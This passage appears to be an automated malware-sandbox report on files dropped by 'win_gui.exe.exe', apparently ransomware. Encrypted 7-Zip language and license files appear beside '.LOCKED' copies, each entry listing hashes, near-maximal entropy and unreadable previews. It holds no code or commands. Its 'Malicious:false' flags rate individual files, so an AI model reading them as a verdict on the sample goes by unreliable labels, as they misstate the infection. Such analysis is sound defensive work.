                                C:\Program Files\7-Zip\Lang\uz.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9991
                                Entropy (8bit):7.979563604320041
                                Encrypted:false
                                SSDEEP:192:ZiDGwe1QBX30JBz2yLgf70XwKU5jQk+PaTeJ3NnlSwTZSRFyo9g9U9J+VOH:Zou1wH8zHs70X5UlVoSiowTZS39PJ+VK
                                MD5:EF48C46F6DE1ACF38291DA7370E63125
                                SHA1:3990FE79FEE8FEE64A8A46037528809D536524C3
                                SHA-256:257E615EC36F3AFE577559A8467A441AF4291C7FF6FCBA2F84733BAB31D41374
                                SHA-512:A4B67A81AC4AED5C09D352A881979D0B5F34D577C8F6E1886CA37609BE8C5D3E51D9F7323EB113C928D9CCBC7EDF11867AA98422F810E1DD6530877B2CB6FD3E
                                Malicious:false
                                Preview:M.-......oF.->..5.Y........@.!..x...uR"...O...A.......k.*.%..S...~.R..bXg.=...P..j!."o......BVW..+..jd*.Q.....M%..v.E......4.6(FJ.P_=.6....|.Z_.M.......e.(;......K.*...Gv..uF.9^E+./.....!..#...C.....-..;.G@2.F..+.W.......1t..j.>........[.t.......Id.."iDDV. ..*e. .k..9....QJht..*2n.w.....'7.....).o....RLk..M.....w..........W....-E..i..I.^K.J..}g(......O}..?h..D..aM...<.'..|+L{...]t.....MU..j7.O.S......O.O..[.H.....y5...<...y..!p.>....9.JK....B].T2.".........|b&Tr.....|f......e..DP. ..Nk.3....T....B...8..$.X8..}..z.%...sVE....m....X...L.k...Z.:....S...Ygs.\6^.R...A.9.9..{...F..R... ....q...t.yd.$*.w............t.{...S./.6.T...t...k..0...B.?..U...y.!..?.#..dU...*...]...Z.l...!....G.S#V...Xq.....=+_..S$.m..2..0...I4....3....CFh.x.b..e6$..z.*HT.)F,4.B..HR...'WX.O.P.B.%{.s....;../..lYw.OJ......<.U8.`...}...[.....u.@2.....@zm..U.t.~.LIn.G.d..1\.^..k./..X.ZN.f?. .u(zt..%5..9.q7Co...Hb.'x...........d.\JP...4.bd6.z.M@...y.a.|r.!...c.-.......%@

                                C:\Program Files\7-Zip\Lang\uz.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9991
                                Entropy (8bit):7.979563604320041
                                Encrypted:false
                                SSDEEP:192:ZiDGwe1QBX30JBz2yLgf70XwKU5jQk+PaTeJ3NnlSwTZSRFyo9g9U9J+VOH:Zou1wH8zHs70X5UlVoSiowTZS39PJ+VK
                                MD5:EF48C46F6DE1ACF38291DA7370E63125
                                SHA1:3990FE79FEE8FEE64A8A46037528809D536524C3
                                SHA-256:257E615EC36F3AFE577559A8467A441AF4291C7FF6FCBA2F84733BAB31D41374
                                SHA-512:A4B67A81AC4AED5C09D352A881979D0B5F34D577C8F6E1886CA37609BE8C5D3E51D9F7323EB113C928D9CCBC7EDF11867AA98422F810E1DD6530877B2CB6FD3E
                                Malicious:false
                                Preview:M.-......oF.->..5.Y........@.!..x...uR"...O...A.......k.*.%..S...~.R..bXg.=...P..j!."o......BVW..+..jd*.Q.....M%..v.E......4.6(FJ.P_=.6....|.Z_.M.......e.(;......K.*...Gv..uF.9^E+./.....!..#...C.....-..;.G@2.F..+.W.......1t..j.>........[.t.......Id.."iDDV. ..*e. .k..9....QJht..*2n.w.....'7.....).o....RLk..M.....w..........W....-E..i..I.^K.J..}g(......O}..?h..D..aM...<.'..|+L{...]t.....MU..j7.O.S......O.O..[.H.....y5...<...y..!p.>....9.JK....B].T2.".........|b&Tr.....|f......e..DP. ..Nk.3....T....B...8..$.X8..}..z.%...sVE....m....X...L.k...Z.:....S...Ygs.\6^.R...A.9.9..{...F..R... ....q...t.yd.$*.w............t.{...S./.6.T...t...k..0...B.?..U...y.!..?.#..dU...*...]...Z.l...!....G.S#V...Xq.....=+_..S$.m..2..0...I4....3....CFh.x.b..e6$..z.*HT.)F,4.B..HR...'WX.O.P.B.%{.s....;../..lYw.OJ......<.U8.`...}...[.....u.@2.....@zm..U.t.~.LIn.G.d..1\.^..k./..X.ZN.f?. .u(zt..%5..9.q7Co...Hb.'x...........d.\JP...4.bd6.z.M@...y.a.|r.!...c.-.......%@

                                C:\Program Files\7-Zip\Lang\va.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7030
                                Entropy (8bit):7.970967234343353
                                Encrypted:false
                                SSDEEP:192:D3qG2iWOuRKM8OtIBIjhA8fxJrHJ5n4BE6AZ+VOg:LqGTqKM8mIS+Kx35n4Ef+VOg
                                MD5:7D7E7666A324BD694C91E52B77E9C8A4
                                SHA1:C5737F0DDEE3F3A98F5046C83B65A71FB958F6D6
                                SHA-256:1AF10A223AADF23A5E859BC34255322D282FA7779EF9D04C03FB24A440BF11AC
                                SHA-512:3195670F88A81011CB031EFB28257DD5ECE9360121288C1B4902802E9932E0B27B6D04961A1BDB7B35F07F75747A0370E7550E33376AF06EA331E441A9F5719B
                                Malicious:false
                                Preview:....h...e..!...,S.WN..s.....qB)..H+....a...k<x.Rc.@..<...r..~.,Q.+.k.u..P.o.%.a...J...`..hl). ...y...z{[h...0tS'$p[.E+s...a$...W0G.VQD3o...:.Y.*..N..t;....D......H..l.]......%..{...y.$...fg.....b..a<l..$.@`g./.R4.(..p.'...YMB.$.oOk....cI..vM....t...._..j......N...%..e/.....).Q..E.}.p..m....>..3....(?R..\...i...Nn2b.lh.a....[....k*..,J....g.c.....Q7V..P.sg{vE(vU...dX......x..4.&..g.....Y.2...r{P..<."oY.ut.{..e..D..ah..1.N9....q.}..]..N.n.+J.V1j..x.......7..W9/....n..s...=...}.-.v....@.x&.\ou.q4.,(...|W..Av=...7FkCT..(.....\......./f;..E..s.6..v.H.WB..K...M%3<.V;..6..y.j-..>l.2......@*\Myye.j.^ky.H.....)d7..0...._.-.r.q.....%..Wa.D.0M...`...JY.O..Z.D.....)..W._.9..{gY...j..cT..]..44.;...-M..T-82..-.zdd..L..._..{.|.x@.\.....HO..K...@....3({.g.^.......D..j.....<*.=j..e..S..l>/8.!.R>..*:.ke...G.E.y]@Z)...q.#..![c-...kq..J....f^..%nB..D.?Yn..@.....''y6..........1}Oi!.....q...j....7.(#.~-!.g.j..T.....1.........3.;<.SmF.......... .N.c.j...q..|....

                                C:\Program Files\7-Zip\Lang\va.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7030
                                Entropy (8bit):7.970967234343353
                                Encrypted:false
                                SSDEEP:192:D3qG2iWOuRKM8OtIBIjhA8fxJrHJ5n4BE6AZ+VOg:LqGTqKM8mIS+Kx35n4Ef+VOg
                                MD5:7D7E7666A324BD694C91E52B77E9C8A4
                                SHA1:C5737F0DDEE3F3A98F5046C83B65A71FB958F6D6
                                SHA-256:1AF10A223AADF23A5E859BC34255322D282FA7779EF9D04C03FB24A440BF11AC
                                SHA-512:3195670F88A81011CB031EFB28257DD5ECE9360121288C1B4902802E9932E0B27B6D04961A1BDB7B35F07F75747A0370E7550E33376AF06EA331E441A9F5719B
                                Malicious:false
                                Preview:....h...e..!...,S.WN..s.....qB)..H+....a...k<x.Rc.@..<...r..~.,Q.+.k.u..P.o.%.a...J...`..hl). ...y...z{[h...0tS'$p[.E+s...a$...W0G.VQD3o...:.Y.*..N..t;....D......H..l.]......%..{...y.$...fg.....b..a<l..$.@`g./.R4.(..p.'...YMB.$.oOk....cI..vM....t...._..j......N...%..e/.....).Q..E.}.p..m....>..3....(?R..\...i...Nn2b.lh.a....[....k*..,J....g.c.....Q7V..P.sg{vE(vU...dX......x..4.&..g.....Y.2...r{P..<."oY.ut.{..e..D..ah..1.N9....q.}..]..N.n.+J.V1j..x.......7..W9/....n..s...=...}.-.v....@.x&.\ou.q4.,(...|W..Av=...7FkCT..(.....\......./f;..E..s.6..v.H.WB..K...M%3<.V;..6..y.j-..>l.2......@*\Myye.j.^ky.H.....)d7..0...._.-.r.q.....%..Wa.D.0M...`...JY.O..Z.D.....)..W._.9..{gY...j..cT..]..44.;...-M..T-82..-.zdd..L..._..{.|.x@.\.....HO..K...@....3({.g.^.......D..j.....<*.=j..e..S..l>/8.!.R>..*:.ke...G.E.y]@Z)...q.#..![c-...kq..J....f^..%nB..D.?Yn..@.....''y6..........1}Oi!.....q...j....7.(#.~-!.g.j..T.....1.........3.;<.SmF.......... .N.c.j...q..|....

                                C:\Program Files\7-Zip\Lang\vi.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9123
                                Entropy (8bit):7.984149649684124
                                Encrypted:false
                                SSDEEP:192:MqQ2vSpaQXZQqjIGDLhbDRDm7KDl+k6SnFpRfdiLUg0e2DSSW+VOG:MqeaQXZQqj5LVd67u6SfiLh+VOG
                                MD5:6C208034748530A6F72CF686E5E4121A
                                SHA1:EBA6EC264D2745AA6DDADFF1C757D496F194A9C6
                                SHA-256:AC8158BC767EFC35CC2D57DFF61A2B62B58E056EF21DE39551E258328CE0A655
                                SHA-512:72269ED619377537F53324A6F3F388F500A9B108023BA0C3B571D953B78848FC380482E7E14F09AE2804A7EAD073B9F4199C4ADC4496E135A4BB172CDF6B7EE0
                                Malicious:false
                                Preview:,.u&.i.....@.J..A........H..6...F]..4..:..-...R.'...2*.5.o..5L.C.t..Vi.i.Q....9..A..U.|.m...F....Z.lX....*..Q..9....IB.O.X#c....i.......e@.@'..v...$.....Ur...{B.....'.h!....'.n....f+.p.d.p..Hy../..J...).'DI..jZ.......Km......0..#&9...QBK^A..J.T\C{F.Z...i.) ...f2.. ;e..\..5JX5B........L...?"..Ejf.;...Z....3../D]........E...t..pEX.1p..pz....[.!....TX.`.82,y...%YV.r~.....r....?3.RV8y.5z.q.M...M.....1..B..K...V....c....d..7....< ........0.'.P...>F.(.T...wV{......_.-.{..h.u.V..nP\..SO.!V.......=."....1.....Q!.g...<v..L...+3^.Brl........SB.UZ...$.G.r.....cb..&sYJ3zI....`.@{.v....U.V...R$.y..O..7..$......5...@>a...!Y..1\..F4.>.aIi.q...I.~.r1.7.Wl2.>..T..r}pd..?..la..Q`..hY.(..<..*B.O..nB...!.,.E..eD..M-....C.E.S.8...MV.M~..!.Z....CUg...Q..R+FUK8...v3......=l....A]...{..#..~.U.........AP..V7B=(...hP.........<.0...d.....?.c-.4[.3........`..i..Qs...-.}......9..Z..R.e....e(.......O...h...J...yd.f..6.,..S.0.......2..[..^..v.8..v....\b..n......%...

                                C:\Program Files\7-Zip\Lang\vi.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9123
                                Entropy (8bit):7.984149649684124
                                Encrypted:false
                                SSDEEP:192:MqQ2vSpaQXZQqjIGDLhbDRDm7KDl+k6SnFpRfdiLUg0e2DSSW+VOG:MqeaQXZQqj5LVd67u6SfiLh+VOG
                                MD5:6C208034748530A6F72CF686E5E4121A
                                SHA1:EBA6EC264D2745AA6DDADFF1C757D496F194A9C6
                                SHA-256:AC8158BC767EFC35CC2D57DFF61A2B62B58E056EF21DE39551E258328CE0A655
                                SHA-512:72269ED619377537F53324A6F3F388F500A9B108023BA0C3B571D953B78848FC380482E7E14F09AE2804A7EAD073B9F4199C4ADC4496E135A4BB172CDF6B7EE0
                                Malicious:false
                                Preview:,.u&.i.....@.J..A........H..6...F]..4..:..-...R.'...2*.5.o..5L.C.t..Vi.i.Q....9..A..U.|.m...F....Z.lX....*..Q..9....IB.O.X#c....i.......e@.@'..v...$.....Ur...{B.....'.h!....'.n....f+.p.d.p..Hy../..J...).'DI..jZ.......Km......0..#&9...QBK^A..J.T\C{F.Z...i.) ...f2.. ;e..\..5JX5B........L...?"..Ejf.;...Z....3../D]........E...t..pEX.1p..pz....[.!....TX.`.82,y...%YV.r~.....r....?3.RV8y.5z.q.M...M.....1..B..K...V....c....d..7....< ........0.'.P...>F.(.T...wV{......_.-.{..h.u.V..nP\..SO.!V.......=."....1.....Q!.g...<v..L...+3^.Brl........SB.UZ...$.G.r.....cb..&sYJ3zI....`.@{.v....U.V...R$.y..O..7..$......5...@>a...!Y..1\..F4.>.aIi.q...I.~.r1.7.Wl2.>..T..r}pd..?..la..Q`..hY.(..<..*B.O..nB...!.,.E..eD..M-....C.E.S.8...MV.M~..!.Z....CUg...Q..R+FUK8...v3......=l....A]...{..#..~.U.........AP..V7B=(...hP.........<.0...d.....?.c-.4[.3........`..i..Qs...-.}......9..Z..R.e....e(.......O...h...J...yd.f..6.,..S.0.......2..[..^..v.8..v....\b..n......%...

                                C:\Program Files\7-Zip\Lang\yo.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11572
                                Entropy (8bit):7.985288889018853
                                Encrypted:false
                                SSDEEP:192:h+OpubDnRXxx0stxPqWsPhz36Gga7wqkM6GyLWzOtpDtftSmf8s+Ehnufk+VOf:QDntL0sbyW6z36GgmpkMVyQOt71r8UFR
                                MD5:D849C4E5EDB4CE298B7FF7BD21CDBEED
                                SHA1:F379523EA769C65110D760718C54EC902ADD5C35
                                SHA-256:187FB52A0781A8D01724FE8A1D8F4EAF8B45E6BC0F5935B9D4628CC7F359737C
                                SHA-512:FB53AB2D380FAE5E82168CADB941B16555FE749C565229C488261C3D2A467D5F2D8517E5E88B3C9E56C1B86B59C72092622B01D7E6936C84D906A1114BACF632
                                Malicious:false
                                Preview:......C.:Y.D.^..R........Dex.......X....fO.......5:....^.c...F....3/..jx.po...%..&...q....jt......b.s....>,.}..l......g...|..D....z......oU1}m...Qt....nA.8.........._..).`oN+Q/5MMr.*Ur..Ay.g.aMz...r.*)=1c.E"....9.~....`6.....xT.(gr.^...E-.......F.2.r|K5..M....O.E...?.n...UCG.AQ....i.1..~....!G#R..@....c.35.,..[Kv....L...r0.=.jMn...U;...JA..i........Z.$b...\.a....O;...F+)kgVs0.]&f.....@.a.z......Q.^Y.`x.a.....@.w.7..U.O..w<NF6r..mO.E.3..%Z..."....1..d..s..5.}.......d..y`..O..G...Q..&....X..h..Na.g..3.0zaI.RSc.."..b.<....1.e`k...Y...A....y..K.jp..h.u..M.........|...H...l.L..Z..a7.(J..K/.4..R5.j.;_.#..{(.d.A{.Uaw....H...e..'..2.V........c...=.....)xq.ut.Oi.........W.O....a..*.@O..*....D./W......l.F.!.....I...P-.;| ....Dx......5...qt...\+....!k^Yb4z.NLrh_N.D.K..U0+w2K...o(...BAU........4.F.).j...c3..T......$....~9+:.`..f'W5.9\..v........\.3K..%.4....W.i.w.>.S...H..+.....+\....HZ......I....kAQ...9....8.(....-.....o..~8.@UG......._ox

                                C:\Program Files\7-Zip\Lang\yo.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11572
                                Entropy (8bit):7.985288889018853
                                Encrypted:false
                                SSDEEP:192:h+OpubDnRXxx0stxPqWsPhz36Gga7wqkM6GyLWzOtpDtftSmf8s+Ehnufk+VOf:QDntL0sbyW6z36GgmpkMVyQOt71r8UFR
                                MD5:D849C4E5EDB4CE298B7FF7BD21CDBEED
                                SHA1:F379523EA769C65110D760718C54EC902ADD5C35
                                SHA-256:187FB52A0781A8D01724FE8A1D8F4EAF8B45E6BC0F5935B9D4628CC7F359737C
                                SHA-512:FB53AB2D380FAE5E82168CADB941B16555FE749C565229C488261C3D2A467D5F2D8517E5E88B3C9E56C1B86B59C72092622B01D7E6936C84D906A1114BACF632
                                Malicious:false
                                Preview:......C.:Y.D.^..R........Dex.......X....fO.......5:....^.c...F....3/..jx.po...%..&...q....jt......b.s....>,.}..l......g...|..D....z......oU1}m...Qt....nA.8.........._..).`oN+Q/5MMr.*Ur..Ay.g.aMz...r.*)=1c.E"....9.~....`6.....xT.(gr.^...E-.......F.2.r|K5..M....O.E...?.n...UCG.AQ....i.1..~....!G#R..@....c.35.,..[Kv....L...r0.=.jMn...U;...JA..i........Z.$b...\.a....O;...F+)kgVs0.]&f.....@.a.z......Q.^Y.`x.a.....@.w.7..U.O..w<NF6r..mO.E.3..%Z..."....1..d..s..5.}.......d..y`..O..G...Q..&....X..h..Na.g..3.0zaI.RSc.."..b.<....1.e`k...Y...A....y..K.jp..h.u..M.........|...H...l.L..Z..a7.(J..K/.4..R5.j.;_.#..{(.d.A{.Uaw....H...e..'..2.V........c...=.....)xq.ut.Oi.........W.O....a..*.@O..*....D./W......l.F.!.....I...P-.;| ....Dx......5...qt...\+....!k^Yb4z.NLrh_N.D.K..U0+w2K...o(...BAU........4.F.).j...c3..T......$....~9+:.`..f'W5.9\..v........\.3K..%.4....W.i.w.>.S...H..+.....+\....HZ......I....kAQ...9....8.(....-.....o..~8.@UG......._ox

                                C:\Program Files\7-Zip\Lang\zh-cn.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8875
                                Entropy (8bit):7.9809073686937895
                                Encrypted:false
                                SSDEEP:192:IUpggjD3n4kjRjpVDsdbmwPXKxlS4TOMOgQoGpvHzrVuf1/Xvbb0Qk+VOj:Xpr9jRjpds5mjFOgfETr8f1Q+VOj
                                MD5:0E857BBB2AAA16B0A0BD503862A1C1A8
                                SHA1:3E10EAB8DA0DDB646DDAADA5EDD31ABBD8B017D6
                                SHA-256:0E8EDC28DD93AD469CB426193E0B68E68E0B80E490C32F99F9F1B3C30E915A9C
                                SHA-512:6085AEA18FD5142234FACB0EDCB508A2851DEC491E10624507FACF282A535F9FE034F8203E6F8E9C06472D7D487DA4FB6000094B383961E5FEFE2F68157545AC
                                Malicious:false
                                Preview:....|..?.....3Y;.......t..).....xV7..$n).|q.....O..E..]lc.k...l!.wvo...?9]......CFO?.wC-..K..m.z.Fl.Z1..T'..7\G....Q...d\..m}.m.s..b.0z...js(...=.....S.^SM0i...!e...x?.M....Bc..;. ..b........s..r..@Z.....g<_.K......D.,.^]d5"..n..2..b......X5....P..#...P.-.#2.@n.Cp].lV.Zy......P.>dv1.R0.9y.[|.<.F...a&l.@3...fp..a.BY...-.....4..Ubd........!....v..C%r.1..8.8%...F...%{..,...D..J...%6..-.D.R+..(D1k6w5.+.}..C~.%.Y..;.t.....Y..t..C..}.h.FV..41.9.D_.@.^s.K.....c.rU..~..DKHS>=.D.M.p.Gy....dJ.u.....V..M.R...Mds....Y..B={$.T.....I...Rp.?X...uj...>OI.Bp.<T.f.fu.&.wk...b.4<..B.O..p8...5.......".b.............=A..Q.0.Y..2#.y+3......8...2.K.\....|...s..V.p]..l.....}lm...t#..fJ\B[..a...Ar\...6.r....v[ig[..qE.ssI.m.x.....^=.. ..w.~..#..QJ.2.o......^J......T.....A7..w.@..P.?..B.WB...9*:M.5..`=..;A,n..@...} .....U#.0..d.tLS.}A.(..i...........]...i.k.%%E...7.8[R......U..,.7....(.......#6.U.3pj.L.f.....VOE....b.6...T..~..*.....$.....$).v...S8P......_.C...a.^.

                                C:\Program Files\7-Zip\Lang\zh-cn.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8875
                                Entropy (8bit):7.9809073686937895
                                Encrypted:false
                                SSDEEP:192:IUpggjD3n4kjRjpVDsdbmwPXKxlS4TOMOgQoGpvHzrVuf1/Xvbb0Qk+VOj:Xpr9jRjpds5mjFOgfETr8f1Q+VOj
                                MD5:0E857BBB2AAA16B0A0BD503862A1C1A8
                                SHA1:3E10EAB8DA0DDB646DDAADA5EDD31ABBD8B017D6
                                SHA-256:0E8EDC28DD93AD469CB426193E0B68E68E0B80E490C32F99F9F1B3C30E915A9C
                                SHA-512:6085AEA18FD5142234FACB0EDCB508A2851DEC491E10624507FACF282A535F9FE034F8203E6F8E9C06472D7D487DA4FB6000094B383961E5FEFE2F68157545AC
                                Malicious:false
                                Preview:....|..?.....3Y;.......t..).....xV7..$n).|q.....O..E..]lc.k...l!.wvo...?9]......CFO?.wC-..K..m.z.Fl.Z1..T'..7\G....Q...d\..m}.m.s..b.0z...js(...=.....S.^SM0i...!e...x?.M....Bc..;. ..b........s..r..@Z.....g<_.K......D.,.^]d5"..n..2..b......X5....P..#...P.-.#2.@n.Cp].lV.Zy......P.>dv1.R0.9y.[|.<.F...a&l.@3...fp..a.BY...-.....4..Ubd........!....v..C%r.1..8.8%...F...%{..,...D..J...%6..-.D.R+..(D1k6w5.+.}..C~.%.Y..;.t.....Y..t..C..}.h.FV..41.9.D_.@.^s.K.....c.rU..~..DKHS>=.D.M.p.Gy....dJ.u.....V..M.R...Mds....Y..B={$.T.....I...Rp.?X...uj...>OI.Bp.<T.f.fu.&.wk...b.4<..B.O..p8...5.......".b.............=A..Q.0.Y..2#.y+3......8...2.K.\....|...s..V.p]..l.....}lm...t#..fJ\B[..a...Ar\...6.r....v[ig[..qE.ssI.m.x.....^=.. ..w.~..#..QJ.2.o......^J......T.....A7..w.@..P.?..B.WB...9*:M.5..`=..;A,n..@...} .....U#.0..d.tLS.}A.(..i...........]...i.k.%%E...7.8[R......U..,.7....(.......#6.U.3pj.L.f.....VOE....b.6...T..~..*.....$.....$).v...S8P......_.C...a.^.

                                C:\Program Files\7-Zip\Lang\zh-tw.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8962
                                Entropy (8bit):7.9778722295890825
                                Encrypted:false
                                SSDEEP:192:B4Jh3DTlEB9yQYqmGhA+UlO76+KJP33sGPPXi8u/P+VO/:YFDksjqmGhdf5KJvPq8uH+VO/
                                MD5:469F748620AACA06628BE3DFBF744487
                                SHA1:9EE206B1BA1BA204CB08B825071344A23B006AA8
                                SHA-256:088177889193D231B56E7E76B46A665F3F67EFFAD727340918551B02801C1907
                                SHA-512:176D5F46A608BF99532EE62375845B3E5EAA2219258DAA6B0241A12FCF4CC74DBA7F8C7D44C2258071DC2E64A189317B1B80C650CC153EFC4C2A92B4769C17F9
                                Malicious:false
                                Preview:..U.[8!".;ED..ic..Bm....8LY...VF!R....-.u.!.....?..b[.4...l.euc....E.(....(S..q.r.y..j.W.&...... .t.,......w0...1.g..j.ViA.|.I..t.K.ZP....#..:......#1..7....i.kV>...%..Lj.)C.F.....U'...C.}..R...4h..~5CH..'.cT........DM9'..k.]....a?...=QM4.'.`.<.n......1q.W.6(..;._.Vp...9.[.j%.%..Yn.p...;8..o..W..E........Y........n.4d=.cU..~...\G..#w.......eE...|...E....a....MIR,....h..;......NX.....fOh.......t.$."C.9g.Y..[;,.....J..<.b5t.#.r..../....V5.L....O1...q..!.7..Jb.%...A*..M...g..a:#n*'.XT..!...FfW..^Yb.G...jp..4_..o....y..k..m..S$..].'.I...K..\.<.......h.$S....3V....w.N..5.....yv{...i^.,.9....+d..........zQ.Jz.neV.....g...j.Fs...lO.j.>C..;.T..0......h_.@..^.3......hVAS#x.....u..-....K.Hr.).Y/@9G}u/.......&.j..s..|...@.G...;...>k.s.K^H*.0...B...".5It..]..1.p...0(.....#...o@.......VK.../.!?:..E....w2.ZV....r..\..`.7...q.,... ..=b.<.:.e.....f..S._.....\....*.}$4....-]..6. ..N{..wv...u..,'"..b.L.~(.....L..... ..P......Z..a.g.1.`?.MnPb..J. .

                                C:\Program Files\7-Zip\Lang\zh-tw.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8962
                                Entropy (8bit):7.9778722295890825
                                Encrypted:false
                                SSDEEP:192:B4Jh3DTlEB9yQYqmGhA+UlO76+KJP33sGPPXi8u/P+VO/:YFDksjqmGhdf5KJvPq8uH+VO/
                                MD5:469F748620AACA06628BE3DFBF744487
                                SHA1:9EE206B1BA1BA204CB08B825071344A23B006AA8
                                SHA-256:088177889193D231B56E7E76B46A665F3F67EFFAD727340918551B02801C1907
                                SHA-512:176D5F46A608BF99532EE62375845B3E5EAA2219258DAA6B0241A12FCF4CC74DBA7F8C7D44C2258071DC2E64A189317B1B80C650CC153EFC4C2A92B4769C17F9
                                Malicious:false
                                Preview:..U.[8!".;ED..ic..Bm....8LY...VF!R....-.u.!.....?..b[.4...l.euc....E.(....(S..q.r.y..j.W.&...... .t.,......w0...1.g..j.ViA.|.I..t.K.ZP....#..:......#1..7....i.kV>...%..Lj.)C.F.....U'...C.}..R...4h..~5CH..'.cT........DM9'..k.]....a?...=QM4.'.`.<.n......1q.W.6(..;._.Vp...9.[.j%.%..Yn.p...;8..o..W..E........Y........n.4d=.cU..~...\G..#w.......eE...|...E....a....MIR,....h..;......NX.....fOh.......t.$."C.9g.Y..[;,.....J..<.b5t.#.r..../....V5.L....O1...q..!.7..Jb.%...A*..M...g..a:#n*'.XT..!...FfW..^Yb.G...jp..4_..o....y..k..m..S$..].'.I...K..\.<.......h.$S....3V....w.N..5.....yv{...i^.,.9....+d..........zQ.Jz.neV.....g...j.Fs...lO.j.>C..;.T..0......h_.@..^.3......hVAS#x.....u..-....K.Hr.).Y/@9G}u/.......&.j..s..|...@.G...;...>k.s.K^H*.0...B...".5It..]..1.p...0(.....#...o@.......VK.../.!?:..E....w2.ZV....r..\..`.7...q.,... ..=b.<.:.e.....f..S._.....\....*.}$4....-]..6. ..N{..wv...u..,'"..b.L.~(.....L..... ..P......Z..a.g.1.`?.MnPb..J. .

                                C:\Program Files\7-Zip\License.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4598
                                Entropy (8bit):7.959436001702031
                                Encrypted:false
                                SSDEEP:96:M47Px0tx6hFSLifiPZEcFbY9Fig//mgWCxyEtLJTp9evuAVOvh:p7J0r6iLQiacwFjWCcEXP+VOvh
                                MD5:7ADECBFF1CB521ED03C69C2D8C6B375E
                                SHA1:8DCBCA775C4B9EF327459F655C59F798E280173C
                                SHA-256:A81311B293B49B6F32DBF65ED0C1D7AD00CCF65663A3E3A784B96907A6CAAA4E
                                SHA-512:C2A999EEDB1AA959414175898F4F8589454BE5387B1DEA5086BE5CFDFF58836728B10BC4669C46204B457C0A823DEA3BB69397942D12936F4E1E42630B01F24D
                                Malicious:false
                                Preview:......78X....g....P.r2...?...|...w.J....`&0V..U..q.Fz3..v.2.vTP.......eK;.?{.S..0.^....^.9|ML.I/)..........}.9Eg......L)p.B()[.Z.x....Y.q.B..tF...G................e..X!.:.<&.S.......6..BhI....?n.1.._......:.g..y....!<`P......;......x-.@.....K2..0..BJM)...........;D]q..-UH.;..1.Nl`c].X.t...G.f......&DI..K...j\....?fwJX_+o. .....F.B...:0@HV{.....@M....ZBT..3..G.r.x.r...5..n.Z.Hc..dZ..G0....2p...l..Az...&B.{.s.'...jm$n.}.......4...v..n.kq..E..m....U$.....6.....D<a...E..vA..1.r...J?....P:.F..r.s.vZ.,p.8y.,.....s.eD.u.*W.'...s|...y|..,.....Qi.*@M4....Ms\q.S0...vE.D.a..I]=;..y.3..W......J........@].?......^.D3.K4+.[.vK.t..,..qh.d...8...h..a.}/aJ......V.$./w...A..1....-.W'...$_}:hY..p=..gk.......6x...1....0..}S.Zx.l?.<n.Kq.x.:[..,...p..."Wv...nZ.L..*D...4~............p(r.h.A....vPn.#..n...Y&.!.17.?a.w ..q..:..4[.Z..$..5k..".Lv*....."...*k.nA**.zE-...Z.....k..........J..G......&W..D4,..#.8....xds..$.F.]1$k....H.Y..k`..t.u=.....].H.\.s...D.+`...^RV.......

                                C:\Program Files\7-Zip\License.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4598
                                Entropy (8bit):7.959436001702031
                                Encrypted:false
                                SSDEEP:96:M47Px0tx6hFSLifiPZEcFbY9Fig//mgWCxyEtLJTp9evuAVOvh:p7J0r6iLQiacwFjWCcEXP+VOvh
                                MD5:7ADECBFF1CB521ED03C69C2D8C6B375E
                                SHA1:8DCBCA775C4B9EF327459F655C59F798E280173C
                                SHA-256:A81311B293B49B6F32DBF65ED0C1D7AD00CCF65663A3E3A784B96907A6CAAA4E
                                SHA-512:C2A999EEDB1AA959414175898F4F8589454BE5387B1DEA5086BE5CFDFF58836728B10BC4669C46204B457C0A823DEA3BB69397942D12936F4E1E42630B01F24D
                                Malicious:false
